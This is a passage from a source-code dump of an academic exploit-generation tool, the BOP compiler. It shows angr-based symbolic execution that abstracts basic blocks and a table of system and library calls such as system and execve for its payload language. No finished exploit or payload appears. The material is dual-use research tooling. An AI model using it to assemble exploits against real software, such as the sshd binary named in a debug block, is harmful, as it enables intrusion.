-----------------------------------------------------------------------\n                if len(node) == 2:                  # we need 2 leaves + 1 operator\n                    self.cond['form'] = 'simple'    # we're in the simple form\n\n                    try:\n                        # swap register and constant if needed\n                        if node[1].op == 'BVS' and node[0].op == 'BVV' and node[0].concrete:\n                            node[0], node[1] = node[1], node[0]\n\n\n                        # if we're in the right form (reg and const), we have our condition\n                        if node[0].op == 'BVS' and node[1].op == 'BVV' and node[1].concrete:\n                            self.cond['reg']   = self.__symreg[node[0]]\n                            self.cond['const'] = state.se.eval(node[1])\n                        else:\n                            self.cond = { }         # not in the right form\n                            return\n\n                    except KeyError:                    \n                        # if not in the right form, __symreg() will throw a KeyError exception\n                        self.cond = { }\n                        return\n\n\n                # -----------------------------------------------------------------------\n                # Check if we're in the extended form: (<reg> <op> <const>) <op> <const>\n                # (example: \"<SAO <Bool (rbx_1_64 + 0x1) == 0x8>>\")\n                # \n                # This is when the iterator (register) gets modified and compared at the\n                # same basic block.\n                # -----------------------------------------------------------------------\n                elif len(node) == 3:                # we need 3 leaves and 2 operators\n                    self.cond['form'] = 'extended'  # we're in the extended form\n\n                    try:\n                        # get left and right side of the comparison\n                        left, right = 
action.condition.split( action.condition.op )

                        # if the constant is on the left side, swap sides
                        if left.op == 'BVV' and left.concrete:
                            left, right = right, left


                        mod_ops = {                 # register modification operations
                            '__add__'    : '+',
                            '__sub__'    : '-',
                            '__mul__'    : '*',
                            '__div__'    : '/',
                            '__and__'    : '&',
                            '__or__'     : '|',
                            '__xor__'    : '^',
                            '__invert__' : '~',
                            '__lshift__' : '<<',
                            '__rshift__' : '>>'
                        }


                        # if the left side is a modification and the right side a constant
                        if left.op in mod_ops and right.op == 'BVV' and right.concrete:
                            self.cond['const']  = state.se.eval(right)
                            self.cond['mod_op'] = mod_ops[ left.op ]

                            reg, const = left.split( left.op )

                            # if the constant is on the left side, swap sides
                            if reg.op == 'BVV' and reg.concrete:
                                reg, const = const, reg

                            # if the modification uses a constant and a register
                            if reg.op   == 'BVS' and reg in self.__symreg and \
                               const.op == 'BVV' and const.concrete:
                                    self.cond['reg']       = self.__symreg[reg]
                                    self.cond['mod_const'] = state.se.eval(const)
                            else:
                                self.cond = { }     # something is not in the right form
                                return
                        else:
                            self.cond = { }
                            return

                    except ValueError:              # split() did not return 2 values
                        self.cond = { }
                        return


                # -----------------------------------------------------------------------
                # Otherwise we're not in the right form
                # -----------------------------------------------------------------------
                else:
                    self.cond = { }
                    continue


                # The problem here is that simgr sometimes "inverts" the condition, so the
                # "target" basic block is the block immediately after the current block. To
                # be consistent, we have to "invert" the operator, so the target basic block
                # is executed when the jump is taken.
                blk = self.__proj.factory.block(self.__entry)

                # check if the target is the next block (assume action.target is concrete)
                if state.se.eval(action.target) == blk.addr + blk.size:
                    self.cond['op'] = {                 # invert the condition
                        '==' : '!=',
                        '!=' : '==',
                        '>'  : '<=',
                        '>=' : '<',
                        '<'  : '>=',
                        '<=' : '>'
                    }[ self.cond['op'] ]

            break                                   # there's up to 1 conditional jump



    # ---------------------------------------------------------------------------------------------
    # __add_sym_vars(): This function extracts all (memory) symbolic variables from an expression.
    #       For instance, given the expression: <BV64 mem_7fffffffffef1e8_82_64 + 0x68>, we 
want to
    #       map the variable 'mem_7fffffffffef1e8_82_64' to its actual address: 0x7fffffffffef1e8.
    #
    # :Arg addr_expr: The address expression to get variables from
    # :Ret: None.
    #
    def __add_sym_vars( self, addr_expr ):
        # A memory symbolic variable is in the form: mem_ADDRESS_RANDOM_SIZE. The AST leaf
        # will be like this: "<BV64 mem_7ffffffffff13e8_4928_64{UNINITIALIZED}>"
        #
        # We want to extract the ADDRESS and SIZE fields
        for leaf in addr_expr.recursive_leaf_asts:  # for each leaf in the AST
            leafstr = leaf.shallow_repr()           # cast it to a string

            # if leaf is a memory variable, extract its address and its size
            if re.search(r'mem_[0-9a-f]+_[0-9]+_[0-9]+', leafstr):
                _, addr, rand, size = leafstr.split('_')

                # size might be followed by the "{UNINITIALIZED}" keyword, which must be dropped;
                # otherwise only the trailing ">" must be dropped
                size = size.replace("{UNINITIALIZED}>", "").replace(">", "")

                # add the symbolic variable to the map
                self.symvars[ leaf ] = (int(addr, 16), int(size, 10) >> 3)



    # ---------------------------------------------------------------------------------------------
    # __memread_callback(): This function is invoked every time that a memory read operation is
    #       performed.
    #
    # :Arg state: Current state to read memory from
    # :Ret: None.
    #
    def __memread_callback( self, state ):
        if self.__callback_mutex == 1:              # if mutex is taken, return
            return

        self.__callback_mutex = 1                   # get lock

        # ---------------------------------------------------------------------
        # If address is part of the .bss/.data, it will be initialized with a
        # default value of 0. 
However, it can get any value (due to AWP) so it
        # should get a symbolic value.
        # ---------------------------------------------------------------------
        # get ELF sections that give default values to their uninitialized variables
        bss  = self.__proj.loader.main_object.sections_map[".bss"]
        data = self.__proj.loader.main_object.sections_map[".data"]

        addr = state.se.eval(state.inspect.mem_read_address)
        # print '=== READ', hex(state.inspect.instruction), hex(addr)

        # check if address is inside .bss or .data sections
        if bss.min_addr  <= addr and addr <= bss.max_addr or \
           data.min_addr <= addr and addr <= data.max_addr:
                # This also works, but it is for Big Endian:
                #       state.memory.make_symbolic('mem', state.inspect.mem_read_address, length)

                # make address symbolic
                symv = state.se.BVS("mem_%x" % addr, state.inspect.mem_read_length << 3)

                state.memory.store(state.inspect.mem_read_address, symv,
                                        state.inspect.mem_read_length, endness=archinfo.Endness.LE)

                # we should read it to update state.inspect.mem_read_expr
                state.memory.load(state.inspect.mem_read_address,
                                        state.inspect.mem_read_length, endness=archinfo.Endness.LE)


        # -------------------------------------------------------------------------------
        # Identifying dereferences is a two-stage process. Here (1st step) we capture all
        # memory load information (which happens before the register write) that happens
        # at this instruction (x64 has 1 distinct memory read per instruction; however
        # instructions like popad do multiple register writes, but this is not an issue
        # here).
        # -------------------------------------------------------------------------------
        self.__load[ state.inspect.instruction ] = (
                state.inspect.mem_read_address,
                state.inspect.mem_read_length,
                state.inspect.mem_read_expr         # this will be updated
        )

        # associate memory expression with memory address (needed later on)
        self.__mem2addr[ state.inspect.mem_read_expr.shallow_repr() ] = \
                                (state.inspect.mem_read_address, state.inspect.mem_read_length)

        # extract memory symbolic variables
        self.__add_sym_vars( state.inspect.mem_read_address )

        self.__callback_mutex = 0                   # release lock



    # ---------------------------------------------------------------------------------------------
    # __regwrite_callback(): This function is invoked every time that a register write operation
    #       is performed.
    #
    # :Arg state: Current state to write register to
    # :Ret: None.
    #
    def __regwrite_callback( self, state ):
        if self.__callback_mutex == 1:              # if mutex is taken, return
            return

        self.__callback_mutex = 1                   # get lock

        try:
            # get register that is being written
            reg = self.__proj.arch.register_names[state.inspect.reg_write_offset]
        except KeyError:                            # just in case
            self.__callback_mutex = 0               # release lock before bailing out
            return


        # TODO: Regwrite only checks writes, but it doesn't check if the previous value persists
        #       afterwards:
        #       
.text:000000000040BCEA         mov     eax, [rbp+ac]
        #       .text:000000000040BCF0         cdqe
        #       .text:000000000040BCF2         shl     rax, 3
        #       .text:000000000040BCF6         mov     rcx, rax
        #       .text:000000000040BCF9         add     rcx, [rbp+nargv]
        #
        # ('sudo' example)
        #
        # We should add some checks to test whether the regwrite is a "mov" or something else


        # print '--------------- ', hex(state.addr), hex(state.inspect.instruction), reg,
        #                           state.inspect.reg_write_expr


        # remember the "raw" value that is being written to the register
        self.__reg_rawval[ reg ] = state.inspect.reg_write_expr

        if reg not in HARDWARE_REGISTERS:           # we only care about specific registers
            self.__callback_mutex = 0               # release lock
            return


        # -------------------------------------------------------------------------------
        # This is the 2nd step of the dereference identification process. At this point
        # we match the instruction that writes a register with the instruction that reads
        # from memory. This is because we want to match the memory read expression with
        # the register write.
        # -------------------------------------------------------------------------------
        elif state.inspect.instruction in self.__load:
            addr, length, _ = self.__load[ state.inspect.instruction ]


            # ok, we have a dereference!
            deps   = [ ]                            # dependent registers
            symtab = { }

            # find register dependencies on the address (e.g., rsi on <BV64 rsi_44_64 + 0x18>)
            for sym, nam in self.__symreg.iteritems():
                # skip registers that are not symbolic (e.g., rbp)
                if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr():
                    deps.append(nam)
                    symtab[nam] = sym


            # there might be dependencies with constant memory addresses as well (i.e., reading
            # from global variables). Such dependencies are handled during trace searching, so
            # we ignore them for now. However, the register dependencies are needed to check
            # whether a register mapping is valid or not.


            # if "deps" has a single element, we know that a register is contained in the "addr"
            # expression. 
If that expression also has a single leaf, we know that this leaf will be
            # that register.
            if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1:
                memrd = length
            else:
                memrd = None


            # (if the basic block has >1 dereferences on the same register, use the most recent one)
            self.regwr[ reg ] = {                   # set data
                'type'  : 'deref',
                'addr'  : addr,
                'deps'  : deps,
                'sym'   : symtab,
                'memrd' : memrd
            }


        # -------------------------------------------------------------------------------
        # The current approach for detecting dereferences is not transitive. Consider the
        # following example:
        #       mov rcx, [rsi + 0x10]
        #       mov rdi, rcx
        #
        # In the 2nd register write, rdi gets an unconstrained symbolic variable (e.g.,
        # <SAO <BV64 Reverse(symbolic_read_unconstrained_17_64)>>) and therefore it's of
        # type 'clob'. However, we want rdi to be treated in the same way as rcx, as
        # they both have the exact same value. Because the SE engine assigns a unique symbolic
        # variable to every memory cell, we can associate them with their addresses. 
\n        # Thus, when a register gets a random symbolic value, we can figure out whether\n        # it is actually a dereference.\n        # -------------------------------------------------------------------------------\n        elif state.inspect.reg_write_expr.shallow_repr() in self.__mem2addr:\n            addr, length = self.__mem2addr[ state.inspect.reg_write_expr.shallow_repr() ]\n\n            # this code is copy-pasta from above\n            deps    = [ ]\n            symtab  = { }\n\n            for sym, nam in self.__symreg.iteritems():\n                if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr():\n                    deps.append(nam)\n                    symtab[nam] = sym\n\n\n            if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1:\n                memrd = length\n            else:\n                memrd = None\n\n\n            self.regwr[ reg ] = {\n                'type'  : 'deref',\n                'addr'  : addr,\n                'deps'  : deps,\n                'sym'   : symtab,\n                'memrd' : memrd\n            }\n            \n\n        # -------------------------------------------------------------------------------\n\n        self.__callback_mutex = 0                   # release lock\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __sig_handler(): Symbolic execution may take forever to complete. To deal with it, we set\n    #       an alarm. 
When the alarm is triggered, this signal handler is invoked and throws an
    #       exception that causes the symbolic execution to halt.
    #
    # :Arg signum: Signal number
    # :Arg frame: Current stack frame
    # :Ret: None.
    #
    def __sig_handler( self, signum, frame ):
        if signum == signal.SIGALRM:                # we only care about SIGALRM

            # throw an exception to force the symbolic execution to halt
            # (angr may ignore it, but at most one raise can ever execute anyway)
            raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT)



    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. 
This function initializes the environment for the symbolic\n    #       execution, it executes the basic block, and performs the abstraction.\n    #\n    # :Arg project: Instance of angr project\n    # :Arg addr: Entry point of the basic block\n    # :Ret: None.\n    #\n    def __init__( self, project, addr ):\n        self.__proj  = project                      # we'll need these\n        self.__entry = addr\n\n        \n        # ---------------------------------------------------------------------\n        # initialize abstraction variables\n        # ---------------------------------------------------------------------\n        self.regwr      = { }                       # all register writes for that block\n        self.memrd      = set()                     # all memory reads for that block\n        self.memwr      = set()                     # all memory writes for that block\n        self.conwr      = set()                     # all concrete memory writes for that block\n        self.splmemwr   = [ ]                       # all memory register writes for that block\n        self.call       = { }                       # function/system call (if any) for that block\n        self.cond       = { }                       # conditional jumps (if any) for that block\n        self.symvars    = { }                       # symbolic variables for memory\n        self.__load     = { }                       # memory loads (for internal use)\n        self.__mem2addr = { }                       # map between memory expressions and addresses\n\n        self.__mem = { }\n        self.__reg_rawval = { }\n\n        # ---------------------------------------------------------------------\n        # Create a blank state and prepare it for symbolic execution.\n        #\n        # TODO: Check options again\n        # ---------------------------------------------------------------------\n        inist = self.__proj.factory.blank_state(    # create a blank state\n            
addr=addr,                              # set address
            #mode='symbolic',
            add_options={                           # configure options
                simuvex.o.AVOID_MULTIVALUED_READS,
                simuvex.o.AVOID_MULTIVALUED_WRITES,
                simuvex.o.NO_SYMBOLIC_JUMP_RESOLUTION,
                simuvex.o.CGC_NO_SYMBOLIC_RECEIVE_LENGTH,
                simuvex.o.NO_SYMBOLIC_SYSCALL_RESOLUTION,
                simuvex.o.TRACK_ACTION_HISTORY,

                # newly added option
                simuvex.o.SYMBOLIC_INITIAL_VALUES
            },
            remove_options=simuvex.o.resilience_options | simuvex.o.simplification
        )

        # configure more options (add/remove)
        inist.options.discard(simuvex.o.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY)
        inist.options.update( {
            simuvex.o.TRACK_REGISTER_ACTIONS,
            simuvex.o.TRACK_MEMORY_ACTIONS,
            simuvex.o.TRACK_JMP_ACTIONS,
            simuvex.o.TRACK_CONSTRAINT_ACTIONS }
        )


        # ---------------------------------------------------------------------
        # initialize all registers with a symbolic variable
        # ---------------------------------------------------------------------
        inist.regs.rax = inist.se.BVS("rax", 64)    # give convenient names
        inist.regs.rbx = inist.se.BVS("rbx", 64)
        inist.regs.rcx = inist.se.BVS("rcx", 64)
        inist.regs.rdx = inist.se.BVS("rdx", 64)
        inist.regs.rsi = inist.se.BVS("rsi", 64)
        inist.regs.rdi = inist.se.BVS("rdi", 64)


        # rbp may also be needed as it's mostly used to access local variables (e.g.,
        # rax = [rbp-0x40]) but some binaries don't use rbp and all references are
        # rsp-relative. 
In these cases it may be worth using rbp as well.\n        if MAKE_RBP_SYMBOLIC:\n            inist.regs.rbp = inist.se.BVS(\"rbp\", 64) # keep rbp symbolic\n        else:\n            inist.registers.store('rbp', FRAMEPTR_BASE_ADDR, size=8, endness=archinfo.Endness.LE)\n        \n        # rsp must be concrete and properly initialized\n        inist.registers.store('rsp', RSP_BASE_ADDR, size=8, endness=archinfo.Endness.LE)\n\n        inist.regs.r8  = inist.se.BVS(\"r08\", 64)\n        inist.regs.r9  = inist.se.BVS(\"r09\", 64)\n        inist.regs.r10 = inist.se.BVS(\"r10\", 64)\n        inist.regs.r11 = inist.se.BVS(\"r11\", 64)\n        inist.regs.r12 = inist.se.BVS(\"r12\", 64)\n        inist.regs.r13 = inist.se.BVS(\"r13\", 64)\n        inist.regs.r14 = inist.se.BVS(\"r14\", 64)\n        inist.regs.r15 = inist.se.BVS(\"r15\", 64)\n\n\n        # ---------------------------------------------------------------------\n        # Other initializations\n        # ---------------------------------------------------------------------        \n        # map symbolic names to registers\n\n        # self.__symreg = { self.__getreg(inist, r):r for r in HARDWARE_REGISTERS }\n        self.__symreg = { \n            inist.regs.rax : 'rax',\n            inist.regs.rbx : 'rbx',\n            inist.regs.rcx : 'rcx',\n            inist.regs.rdx : 'rdx',\n            inist.regs.rsi : 'rsi',\n            inist.regs.rdi : 'rdi',\n            inist.regs.rbp : 'rbp',\n            inist.regs.rsp : 'rsp',\n            inist.regs.r8  : 'r8',\n            inist.regs.r9  : 'r9',\n            inist.regs.r10 : 'r10',\n            inist.regs.r11 : 'r11',\n            inist.regs.r12 : 'r12',\n            inist.regs.r13 : 'r13',\n            inist.regs.r14 : 'r14',\n            inist.regs.r15 : 'r15'\n        }\n\n\n        # UPDATE: Don't create a symbolic stack, as this consumes all the virtual memory and\n        # may crash the machine. 
By carefully configuring rsp and rbp within the virtual\n        # page limits, we can achieve the same effect, so we don't need a symbolic stack.\n        #\n        # The main issue here is permissions (the stack may not appear as R+W), but as long as\n        # both rsp and rbp point into the same page, there is no problem.\n        #\n        #\n        #       # create a symbolic stack (required to have writable pages)\n        #       stack = inist.se.BVS(\"stack\", self.__proj.arch.bits * _STACK_SZ)     \n        #\n        #       # write symbolic stack to memory  \n        #       # inist.memory.store(inist.regs.sp, stack, endness=archinfo.Endness.LE)                    \n        #       inist.memory.store(STACK_BASE_ADDR, stack, endness=archinfo.Endness.LE)\n\n        # when solver gives up (in milliseconds)\n        inist.se._solver.timeout = ABSBLK_TIMEOUT*1000\n\n\n        # ---------------------------------------------------------------------\n        # Hooks for identifying dereferences\n        # ---------------------------------------------------------------------\n        self.__callback_mutex = 0                   # hooks are enabled\n\n        inist.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__regwrite_callback)\n        inist.inspect.b('mem_read',  when=angr.BP_AFTER,  action=self.__memread_callback)\n        \n        \n        # -------------------------------------------------------------------------\n        # Do the symbolic execution (using simulation managers)\n        # ------------------------------------------------------------------------- \n        simgr = self.__proj.factory.simulation_manager(thing=inist)\n        simgr.save_unconstrained = True             # do not discard unconstrained stashes\n\n\n        signal.signal(signal.SIGALRM, self.__sig_handler)\n        signal.alarm(ABSBLK_TIMEOUT)                  \n\n\n        # make sure that you execute the normalized block\n        # TODO: cleanup\n        
node = ADDR2NODE[self.__entry]\n        num_inst = len(node.instruction_addrs) if node is not None else None\n        if num_inst:\n            simgr.step(num_inst=num_inst)\n        else:\n            simgr.step()                            # execute 1 basic block\n    \n        signal.alarm(0)                             # disable alarm\n\n\n        if simgr.active:                            # check if execution was successful\n            newst = simgr.active[0]                 # get the new state (after execution)\n\n        elif simgr.unconstrained:\n            # because we execute a single basic block, it's possible to end up in a state whose\n            # instruction pointer depends on symbolic data, and hence not know how to proceed\n            # (i.e., the unconstrained stash)\n            newst = simgr.unconstrained[0]\n\n        elif simgr.deadended:                       # check if execution can't continue (retq)\n            newst = simgr.deadended[0]              # work with what you have\n           \n        else:                                       # everything else should generate an error\n            print simgr.stashes\n            raise Exception('There are no usable stashes!')\n\n\n        # -------------------------------------------------------------------------\n        # Analyze results and generate the abstractions\n        # ------------------------------------------------------------------------- \n        self.__reg_w(newst)                         # analyze register writes\n        self.__mem_r(newst)                         # analyze memory reads\n        self.__mem_w(newst)                         # analyze memory writes\n        self.__call(newst)                          # analyze function/system calls\n        self.__cond(newst)                          # analyze conditional jumps\n\n\n        # -------------------------------------------------------------------------\n        # Apply (any) patches\n        #\n      
  # Instructions like 'rep movsq' incorrectly classify rsi and rdi as 'deref'\n        # types. This is because angr puts a single rep* instruction in its own\n        # basic block (as VEX IR cannot contain loops). To fix that, we simply mark\n        # the used registers as clobbering.\n        # ------------------------------------------------------------------------- \n        blk_insns = node.block.capstone.insns       # get block instructions\n\n        if len(blk_insns) == 1 and 'rep' in blk_insns[0].insn.mnemonic:\n            # name = blk_insns[0].insn.insn_name()    # get instruction name (w/o the rep*)\n              \n            # make 'rsi', 'rdi' and 'rcx' clobbering (all of them are modified)\n            self.regwr['rdi'] = {'type' : 'clob'}    \n            self.regwr['rsi'] = {'type' : 'clob'}\n            self.regwr['rcx'] = {'type' : 'clob'}            \n\n\n        '''\n        print\n        print '-------------------- Register Writes --------------------'                   \n        for a, b in self.regwr.iteritems():\n            print a, b\n\n        print '-------------------- Memory Reads --------------------'            \n        for a, b in self.memrd:\n            print a, b\n\n        print '-------------------- Memory Writes --------------------'            \n        for a, b in self.memwr:\n            print a, b\n\n        print '-------------------- Concrete Writes --------------------'            \n        for a, b in self.conwr:\n            print a, b\n\n        print '-------------------- SPL Memory Writes --------------------'            \n        for a in self.splmemwr:\n            print a\n\n        print '-------------------- Calls --------------------'            \n        print self.call\n\n        print '-------------------- Conditional Jumps --------------------'            \n        print self.cond\n        '''\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    
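# Usage sketch: abstracting a single basic block and inspecting the result.\n    # (The binary path and block address below are placeholders; 'abstract_ng'\n    # is the driver used in the DEBUG section at the bottom of this file.)\n    #\n    #   proj = angr.Project('./target', load_options={'auto_load_libs': False})\n    #   blk  = abstract_ng(proj, 0x400f00)          # abstract one basic block\n    #\n    #   for name, absn in blk:                      # iterate over all abstractions\n    #       print name, absn\n    #\n    #   print blk['regwr']                          # or fetch one abstraction directly\n    # ---------------------------------------------------------------------------------------------\n    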
# __getitem__(): An alternative way to get block \"abstractions\".  \n    #\n    # :Arg what: The name of the abstraction that you want to get\n    # :Ret: The requested abstraction.\n    # \n    def __getitem__( self, what ):\n        try:\n            return {\n                'regwr'    : self.regwr,\n                'memrd'    : self.memrd,\n                'memwr'    : self.memwr,\n                'conwr'    : self.conwr,\n                'splmemwr' : self.splmemwr,\n                'call'     : self.call,\n                'cond'     : self.cond,\n                'symvars'  : self.symvars\n            }[ what ]\n        except KeyError:\n            return None                             # abstraction not found\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __iter__(): Iterate over all abstractions. This function is a generator over all possible\n    #       abstractions.\n    #\n    # :Ret: Each iteration yields a different (name, abstraction) tuple.\n    # \n    def __iter__( self ):   \n        yield 'regwr',    self.regwr\n        yield 'memrd',    self.memrd\n        yield 'memwr',    self.memwr\n        yield 'conwr',    self.conwr\n        yield 'splmemwr', self.splmemwr\n        yield 'call',     self.call\n        yield 'cond',     self.cond\n        yield 'symvars',  self.symvars \n\n\n\n# -------------------------------------------------------------------------------------------------\n'''\nif __name__ == '__main__':                          # DEBUG ONLY\n    import angr\n\n    project = angr.Project('eval/opensshd/sshd', load_options={'auto_load_libs': False})    \n    # project.analyses.CFGFast()                    # to prepare project.kb.functions\n\n    # Problem: Indirect pointers in .bss:\n    #   .text:00000000004050B1         mov     rax, cs:public_key\n    #   .text:00000000004050B8         mov     rdi, [rax+20h]          ; value\n    #\n    # abstr = 
abstract_ng(project, 0x4050B1)\n\n    # abstr = abstract_ng(project, 0x416610)\n    abstr = abstract_ng(project, 0x416631)\n\n    # TODO: check me again!\n    abstr = abstract_ng(project, 0x40c01f)\n\n    for a, b in abstr:\n        print '\\t', a, b\n\n    print 'done!'\n'''\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/calls.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# calls.py\n#\n# This module contains all declarations for system and library calls that SPL supports. A call is\n# declared as a tuple (name, nargs, modregs):\n#\n#       name    : The library/system call name\n#       nargs   : The number of its arguments. Set to INFINITY for variadic functions.\n#       modregs : A list of all registers that are modified when the call returns. 
Note that rax \n#                 is always modified as it has the return value.\n#\n# To keep the implementation simple, we do not support library calls that take arguments on the\n# stack.\n#\n# Also, it is possible to declare any custom calls that reside in the binary.\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Calling Conventions\n# -------------------------------------------------------------------------------------------------\nSYSCALL_CC = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']   # syscalls pass arg #4 in r10 (rcx is clobbered)\nLIBCALL_CC = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']   # System V AMD64 function-call convention\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Supported system calls\n# -------------------------------------------------------------------------------------------------\nsyscalls__ = [\n    # ssize_t read(int fd, void *buf, size_t count)\n    ('read',    3,  ['rax', 'rcx', 'r10', 'r11']),\n\n    # ssize_t write(int fd, const void *buf, size_t count)\n    ('write',   3,  ['rax', 'rcx', 'r10', 'r11']),\n\n    # void *sbrk(intptr_t increment)\n    ('sbrk',    1,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),\n\n    # int brk(void *addr)\n    ('brk',     1,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),\n\n    # int dup(int oldfd)\n    ('dup',     1,  ['rax', 'rcx', 'r11']),\n\n    # int dup2(int oldfd, int newfd)\n    ('dup2',    2,  ['rax', 'rcx', 'r10', 'r11']),\n\n    # unsigned int alarm(unsigned int seconds)\n    ('alarm',   1,  ['rax', 'rcx', 'r10', 'r11']),\n\n\n    # Feel free to append more syscalls...\n]\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Supported library calls\n# -------------------------------------------------------------------------------------------------\nlibcalls__ = [\n    # int 
system(const char *command)\n    ('system',  1,  ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']),\n\n    # int puts(const char *s)\n    ('puts',    1,  ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']),\n\n    # int execve(const char *filename, char *const argv[], char *const envp[])\n    ('execve',  3,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),\n\n    # int execv(const char *filename, char *const argv[])\n    ('execv',   2,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),\n    \n    # int execl(const char *path, const char *arg, ...);\n    ('execl',   2,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),\n\n    # int printf(const char *format, ...)\n    ('printf',  INFINITY,  ['rax', 'rcx', 'rdx', 'rsi', 'rdi',  'r8', 'r10', 'r11']),\n\n    # ssize_t send(int sockfd, const void *buf, size_t len, int flags);\n    # (we can ignore the 4th parameter for now)\n    ('send',    3,  []),\n\n    # void exit(int status)\n    ('exit',    1,  []),\n\n\n    # Feel free to append more libcalls...\n]\n\n\n\n# -------------------------------------------------------------------------------------------------\n# In case you don't want to distinguish them\n# -------------------------------------------------------------------------------------------------\ncalls__ = syscalls__ + libcalls__\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Groups of function calls that have similar effects\n# -------------------------------------------------------------------------------------------------\ncall_groups__ = [\n    ['puts',   'printf'],\n    ['execve', 'execv', 'execl' ],\n]\n\n\n\n# -------------------------------------------------------------------------------------------------\n# find_syscall(): Search for a specific system call.\n#\n# :Arg name: Name of the syscall\n# :Ret: If system call exists, function returns the associated entry in syscalls__. 
Otherwise None\n#       is returned.\n#\ndef find_syscall( name ):\n    call = filter(lambda call: call[0] == name, syscalls__)\n\n    if len(call) == 0:\n        return None\n\n    elif len(call) == 1:\n        return call[0]\n\n    else:\n        raise Exception(\"System call '%s' has >1 entries in syscalls__ table.\" % name)\n\n\n\n# -------------------------------------------------------------------------------------------------\n# find_libcall(): Search for a specific library call.\n#\n# :Arg name: Name of the library call\n# :Ret: If library call exists, function returns the associated entry in libcalls__. Otherwise None\n#       is returned.\n#\ndef find_libcall( name ):\n    call = filter(lambda call: call[0] == name, libcalls__)\n\n    if len(call) == 0:\n        return None\n\n    elif len(call) == 1:\n        return call[0]\n\n    else:\n        raise Exception(\"Library call '%s' has >1 entries in libcalls__ table.\" % name)\n\n\n\n# -------------------------------------------------------------------------------------------------\n# find_call(): Search for a specific call (either library or system)\n#\n# :Arg name: Name of the call\n# :Ret: If call exists, function returns the associated entry in calls__. Otherwise None is\n#       returned.\n#\ndef find_call( name ):\n    sys = find_syscall(name)\n    lib = find_libcall(name)\n\n    return sys if sys else lib                      # logic OR\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/capability.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# capability.py\n#\n# This module measures the capability of the program. That is, program's capability gives a good\n# indication, on \"what the program is capable of executing\" in terms of SPL payloads. 
